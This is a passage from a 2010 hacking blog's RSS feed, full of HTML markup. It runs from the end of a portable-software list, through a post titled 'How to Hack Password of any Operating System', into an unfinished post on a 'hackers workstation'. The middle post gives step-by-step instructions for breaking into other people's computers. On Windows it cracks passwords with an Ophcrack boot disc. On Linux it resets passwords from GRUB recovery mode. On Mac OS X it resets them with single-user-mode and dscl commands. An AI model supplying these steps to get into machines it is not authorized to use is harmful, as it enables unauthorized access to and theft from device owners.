&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/rockxp.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;RockXP&lt;/a&gt;&amp;nbsp;[win, 768kb] – handy utility for retrieving Win XP’s product key&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/WhoisThisDomain.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable domain lookup tool"&gt;WhoisThisDomain&lt;/a&gt;&amp;nbsp;[Win, 42kb] – view owner and registration info for any domain name&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/convert.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable unit converter"&gt;Converter&lt;/a&gt;&amp;nbsp;– portable unit convertsion utility&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Developer Tools (Techies Only)&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Nvu [&lt;a href="http://portableapps.com/apps/development/nvu_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable webpage editor"&gt;Win&lt;/a&gt;&amp;nbsp;(7.3 mb),&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/nvu/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Mac&lt;/a&gt;&amp;nbsp;(12 mb)] – easy-to-use webpage editor. Simpler alternative to Dreamweaver and Microsft Frontpage&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.server2go-web.de/download/download.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Server2Go&lt;/a&gt;&amp;nbsp;– apache webserver (no configurations needed)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://rubyforge.org/projects/instantrails/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;InstantRails&lt;/a&gt;[Win, 60mb] – contains Ruby, Rails, Apache, and MySQL, all preconfigured and ready to run.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://portableapps.com/apps/internet/putty_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable putty"&gt;Putty&lt;/a&gt;&amp;nbsp;[Win, 0.9 mb] – lightweight telnet and SSH client&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.fmip.org/download.php" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Follow-Me IP&lt;/a&gt;&amp;nbsp;– displays your external IP address&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://portableapps.com/apps/development/xampp" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable server"&gt;XAMPP&lt;/a&gt;&amp;nbsp;[Win, 25/17 mb] – integrated server package of Apache, mySQL, PHP and Perl. Just Unzip and Run&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/hfs.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;HTTP File Server&lt;/a&gt;&amp;nbsp;[Win] – simple and easy-to-use file server for personal file sharing.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/cports.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;CurrPorts&lt;/a&gt;&amp;nbsp;[Win, 46kb]- lets you view a list of ports that are currently in use, along with applications that use them&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;FTP Servers:&amp;nbsp;&lt;a href="http://www.snapfiles.com/get/quickeasyftpserver.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Quick’n Easy FTP Server&lt;/a&gt;&amp;nbsp;[Win, 355kb],&amp;nbsp;&lt;a href="http://jeanmatthieu.free.fr/pureftpd/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;PureFTPdManager&lt;/a&gt;&amp;nbsp;[Mac, 10.9mb]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;All-In-One Packages&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://portableapps.com/suite" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="collection of portable software"&gt;PortableApps Suite&lt;/a&gt;&amp;nbsp;[Win, 89.5mb] – includes 7 programs for essential needs (office, email, IM client, etc.) + cool Startup manager and backup utility&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://mac.softpedia.com/get/Business/FSuite-CD.shtml" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="collection of portable apps for Mac"&gt;FSuite&lt;/a&gt;&amp;nbsp;[Mac, 668.3mb] – over 30 useful tools in one file (Office, Graphic, Audio, Video, Internet, Developer Tools and Games)&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Operating Systems (’HowTo’ Articles)&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://nothickmanuals.info/doku.php?id=minivmac" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="MAC OS X on USB drive"&gt;Mac OS Classic 7&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Linux:&amp;nbsp;&lt;a href="http://www.tuxmachines.org/node/14738%20/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable Knoppix"&gt;Knoppix&lt;/a&gt;,&amp;nbsp;&lt;a href="http://www.debuntu.org/how-to-install-ubuntu-linux-on-usb-bar" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable Ubuntu"&gt;Ubuntu&lt;/a&gt;,&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.tomshardware.com/2005/09/09/windows_in_your_pocket/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="how to make XP portable"&gt;Win XP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Hack Password of any Operating System</title><link>http://0dl.blogspot.com/2010/11/how-to-hack-password-of-any-operating.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:42:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-2486959702008509178</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: small; line-height: normal;"&gt;&lt;/span&gt;One thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems.&amp;nbsp;Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="color: #3c78a7; font-family: Arial; font-size: large;"&gt;Windows&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful &amp;nbsp;program is Ophcrack, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;You can download OphCrack from the following link:&lt;/div&gt;&lt;blockquote style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-top-width: 1px; color: #333333; font-family: Arial, Helvetica; font-size: 12px; font: normal normal normal 1em/normal Arial; line-height: 1.5em; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 10px; padding-bottom: 0px; padding-left: 10px; padding-right: 10px; padding-top: 10px; text-align: justify;"&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;http://ophcrack.sourceforge.net/&lt;/div&gt;&lt;/blockquote&gt;&lt;h3 style="color: #3c78a7; font-family: Arial, Helvetica; font-weight: bold; font: normal normal normal 1.3em/normal Arial; line-height: 21px; margin-bottom: 3px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Linux&lt;a name='more'&gt;&lt;/a&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Linux is an operating system which is quickly gaining popularity in mainstream, but not so common that you’re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is OS X.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for.&lt;/div&gt;&lt;h3 style="color: #3c78a7; font-family: Arial, Helvetica; font-weight: bold; font: normal normal normal 1.3em/normal Arial; line-height: 21px; margin-bottom: 3px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Mac&lt;/span&gt;&lt;/h3&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Finally we take on Mac’s OS X which as we said earlier is based on Unix and is difficult to change password compared to Linux but nothing is &amp;nbsp;impossible to be hacked.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;The easiest method would be to use Ophcrack on this also as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up, select UTILITIES &amp;gt; RESET PASSWORD. Choose a new password and then use that to log in.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;fsck -fy&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;mount -uw /&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;dscl . -passwd /Users/UserName newpassword&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;That’s it. Now that the password is reset, you can login.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Setting Up A Hackers Workstation</title><link>http://0dl.blogspot.com/2010/11/setting-up-hackers-workstation.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:32:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-1710536448124231502</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Hi guys, Hope you have gone through the&lt;a href="http://0dl.blogspot.com/2010/11/your-first-step-towards-hacking.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="First Step to Hacking"&gt;&amp;nbsp;previous article&lt;/a&gt;&amp;nbsp;and you’re now ready to take on the hacking stuff.&amp;nbsp; At very beginning you have to make your workstation ready, so that things will be available to you at one click.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;You have to collect some of the tools, Operating System &amp;amp; documentation on your PC with a very clear format.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Operating System:&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Which OS to use, choice is all yours. Windows in all cases is not so ‘made for hacking’ according to me. Whatever XP,Vista or windows 7. They are all just OS which are made for novice public which can learn computers.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;If you are a regular Linux user, Then shift to Backtrack Linux. It is Linux made for hacker geeks &amp;amp; completely embedded with all penetration testing tools in it. You can&amp;nbsp;&lt;a href="http://www.remote-exploit.org/backtrack.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Backtrack Download"&gt;Download Backtrack here&lt;/a&gt;. But if you have never used Linux &amp;amp; wish to learn then you can use basic Linux distributions like&amp;nbsp;&lt;a href="http://www.ubuntu.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="Ubuntu"&gt;Ubuntu&lt;/a&gt;. But remember that you or not supposed to learn Linux desktop environment like windows, you have to learn its shell or terminal. (command prompt of Linux)&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;As I said Choice is all yours you can go with Windows also. Its all on you.&amp;nbsp; (Suggestion: If you can’t make it habit to learn new things, you can never be a HACKER)&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Hackers Toolkit:&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;In your root directory or C:/ in windows make a folder named Tools. So that you can access all tools from command prompt easily E.g.&amp;nbsp; 